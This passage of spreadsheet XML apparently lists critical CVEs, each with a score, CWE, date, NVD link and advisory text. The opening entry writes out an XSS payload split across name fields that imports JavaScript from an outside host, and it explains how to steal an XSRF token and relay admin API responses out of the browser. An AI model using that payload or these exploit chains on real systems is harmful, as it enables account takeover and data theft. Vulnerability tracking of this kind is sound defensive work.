via `import()`. Using the split-field technique (`lastName = "&lt;img src=x"`, `firstName = "onerror=import('//nsas.cc/p')&gt;"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.</t>
        </is>
      </c>
      <c r="M304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54694</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54725</t>
        </is>
      </c>
      <c r="C305" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D305" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E305" s="5" t="inlineStr"/>
      <c r="F305" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G305" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr">
        <is>
          <t>vault-secrets-webhook is a Kubernetes mutating webhook that makes direct secret injection into Pods possible. Prior to 1.23.1, parseVaultConfig() in pkg/webhook/config.go accepts the vault.security.banzaicloud.io/vault-addr annotation, MutateConfigMap and MutateSecret call newVaultClient in pkg/webhook/webhook.go, and vault.security.banzaicloud.io/vault-serviceaccount can cause a ServiceAccount JWT to be sent to an attacker-controlled Vault address. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54725</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54754</t>
        </is>
      </c>
      <c r="C306" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D306" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E306" s="5" t="inlineStr"/>
      <c r="F306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367, CWE-682</t>
        </is>
      </c>
      <c r="L306" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, marketplace settlement in core/kapp/market/market.go reads MarketOrderData.ReferralPercentage from the listing while reading asset.Royalties.MarketPercentage live at purchase time. An asset owner can create a valid listing and then use AssetTrigger UpdateRoyalties to make the combined referral and royalty percentages exceed the bid. executeBuyMarket pays referral and royalty amounts unconditionally while computeMarketOwnerAmount silently skips a nonpositive seller remainder, allowing MarketBuy, BuyItNow, or auction Claim settlement to credit more KLV or sale currency than the buyer paid. This can create unbacked currency and corrupt token supply integrity. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54754</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54755</t>
        </is>
      </c>
      <c r="C307" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D307" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E307" s="5" t="inlineStr"/>
      <c r="F307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, split-royalty fields decoded in core/kapp/builtInFunctions/utils.go can contain values greater than core.HundredPercent, and core/kapp/kda/create.go and core/kapp/kda/trigger.go sum those values in uint32 accumulators. Crafted values such as two 0x80000000 entries wrap the validation sum to zero and pass CheckValid100Params. Royalty payout paths in core/kapp/accounts/accounts.go, core/kapp/market/market.go, and core/kapp/ito/ito.go then credit each oversized split amount and silently discard a negative remainder, allowing ordinary asset transfers, marketplace purchases, or ITO purchases to create unbacked KLV or other assets. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="M307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54755</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55085</t>
        </is>
      </c>
      <c r="C308" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D308" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E308" s="5" t="inlineStr"/>
      <c r="F308" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. Prior to 3.3.1, result.appendSpan in src/static/js/domline.ts interpolates the start attribute of a numbered list directly into an unquoted ol start attribute before assigning the generated markup to node.innerHTML. ImportEtherpad.setPadRaw in src/node/utils/ImportEtherpad.ts accepts attacker-controlled attribute-pool values from a crafted .etherpad import, including list:number1 and a malicious start value. Any user with write access to a pad can store markup that executes as cross-site scripting when another user opens the pad or /timeslider, including when an administrator views the pad. This issue is fixed in version 3.3.1.</t>
        </is>
      </c>
      <c r="M308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55085</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65669</t>
        </is>
      </c>
      <c r="C309" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D309" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E309" s="5" t="inlineStr"/>
      <c r="F309" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71193</t>
        </is>
      </c>
      <c r="C310" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D310" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E310" s="5" t="inlineStr"/>
      <c r="F310" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Designate before 22.0.1, zone creation checks (_is_subzone, _is_superzone, and the duplicate-zone DB constraint) are scoped to the target pool only. An authenticated user can bypass these checks by scheduling a zone to a different pool via the AttributeFilter scheduler, creating an overlapping zone that conflicts with another tenant's zone. This enables cross-tenant DNS hijack (redirecting traffic to attacker-controlled IPs) and DNS denial of service (NODATA responses). Exploitation requires a multi-pool deployment with AttributeFilter enabled in scheduler_filters, which is a non-default but documented and supported configuration for self-service tiering.</t>
        </is>
      </c>
      <c r="M310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71193</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71319</t>
        </is>
      </c>
      <c r="C311" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D311" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E311" s="5" t="inlineStr"/>
      <c r="F311" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. Prior to 3.3.1, Nuxt DevTools (development mode only) exposes a bidirectional RPC channel over the Vite HMR WebSocket via the nuxt:devtools:rpc plugin. On affected versions the channel has no authentication: any client that can reach the Vite HMR endpoint (ws://&lt;host&gt;:&lt;port&gt;/, subprotocol vite-hmr) can call RPC methods, with no token, handshake, or origin check before the channel is established. The updateOptions(), clearOptions(), and openInEditor() methods do not enforce the ensureDevAuthToken check that the other mutating methods use. openInEditor() reads the persisted behavior.openInEditor value and passes it to the launch-editor package, which spawns it as a child process. That value is settable through the equally unauthenticated updateOptions(). An attacker who can reach the HMR port can therefore chain updateOptions('behavior', { openInEditor: '&lt;command&gt;' }) then openInEditor('&lt;any-existing-file&gt;') to execute an arbitrary program on the developer's machine. This issue is fixed in 3.3.1.</t>
        </is>
      </c>
      <c r="M311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71319</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72737</t>
        </is>
      </c>
      <c r="C312" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D312" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E312" s="5" t="inlineStr"/>
      <c r="F312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.29.8 and earlier, backup.create, backup.update, and backup.restoreBackupWithLogs in apps/dokploy/server/api/routers/backup.ts accept a client-controlled destinationId and use the referenced destination without verifying that destination.organizationId equals ctx.session.activeOrganizationId. An authenticated member with backup permissions for a service in one organization can cause another organization's S3 accessKey and secretAccessKey to be materialized by packages/server/src/utils/backups/utils.ts getS3Credentials on the attacker's service host, read that organization's backup objects, or redirect and poison backups across tenant boundaries.</t>
        </is>
      </c>
      <c r="M312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72737</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72877</t>
        </is>
      </c>
      <c r="C313" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D313" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E313" s="5" t="inlineStr"/>
      <c r="F313" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G313" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L313" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the dockerImage field is interpolated without quoting into shell commands in buildRemoteDocker() in packages/server/src/utils/providers/docker.ts and is validated only as an optional string. An authenticated user with application create or update permission can use shell command substitution in dockerImage to execute arbitrary commands on the local build host or a remote SSH build target, exposing host secrets and other projects. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72877</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72878</t>
        </is>
      </c>
      <c r="C314" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D314" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E314" s="5" t="inlineStr"/>
      <c r="F314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy's backup and restore pipeline constructs shell commands by directly interpolating user-controlled database fields into bash -c "..." and sh -c "..." strings, then executes them via child_process.exec(). An authenticated admin/owner can inject arbitrary OS commands that execute on the host machine running Dokploy (not just inside a container). This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72878</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73300</t>
        </is>
      </c>
      <c r="C315" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D315" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E315" s="5" t="inlineStr"/>
      <c r="F315" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G315" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L315" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.</t>
        </is>
      </c>
      <c r="M315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73300</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73843</t>
        </is>
      </c>
      <c r="C316" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D316" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E316" s="5" t="inlineStr"/>
      <c r="F316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G316" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668, CWE-862</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.2 and 1.1.2, internal/cluster-gateway/server.go served caller-facing management APIs on the externally reachable agent listener without authentication, allowing network-reachable attackers to invoke /api/proxy/ and /api/exec/ operations, proxy the data-plane Kubernetes API, and execute commands in workload pods in multi-cluster deployments. This issue is fixed in versions 1.0.2 and 1.1.2.</t>
        </is>
      </c>
      <c r="M316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73843</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81048</t>
        </is>
      </c>
      <c r="C317" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D317" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E317" s="5" t="inlineStr"/>
      <c r="F317" s="5" t="inlineStr"/>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L317" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Remote Code execution</t>
        </is>
      </c>
      <c r="M317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81048</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="C318" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D318" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E318" s="5" t="inlineStr"/>
      <c r="F318" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="L318" s="5" t="inlineStr">
        <is>
          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82100</t>
        </is>
      </c>
      <c r="C319" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D319" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E319" s="5" t="inlineStr"/>
      <c r="F319" s="5" t="inlineStr"/>
      <c r="G319" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82100</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82107</t>
        </is>
      </c>
      <c r="C320" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D320" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E320" s="5" t="inlineStr"/>
      <c r="F320" s="5" t="inlineStr"/>
      <c r="G320" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information and bypass security restrictions due to improper authentication.</t>
        </is>
      </c>
      <c r="M320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82107</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84333</t>
        </is>
      </c>
      <c r="C321" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D321" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E321" s="5" t="inlineStr"/>
      <c r="F321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I321" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84333</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84352</t>
        </is>
      </c>
      <c r="C322" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D322" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E322" s="5" t="inlineStr"/>
      <c r="F322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I322" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84352</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84353</t>
        </is>
      </c>
      <c r="C323" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D323" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E323" s="5" t="inlineStr"/>
      <c r="F323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I323" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr">
        <is>
          <t>Use after free in Shared Tab Groups in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84353</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85042</t>
        </is>
      </c>
      <c r="C324" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D324" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E324" s="5" t="inlineStr"/>
      <c r="F324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I324" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85042</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85047</t>
        </is>
      </c>
      <c r="C325" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D325" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E325" s="5" t="inlineStr"/>
      <c r="F325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr">
        <is>
